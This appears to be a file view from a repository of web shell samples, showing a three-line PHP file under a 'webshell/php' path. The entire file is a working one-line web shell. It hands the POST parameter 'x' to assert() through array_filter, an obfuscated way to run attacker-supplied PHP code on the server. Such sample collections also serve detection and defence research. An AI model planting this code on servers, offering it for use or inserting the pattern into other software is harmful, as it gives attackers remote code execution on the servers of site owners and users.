webshell/php/2020.08.20.09.php

3 lines
56 B
PHP

<?php
array_filter(array($_POST['x']),'assert');
?>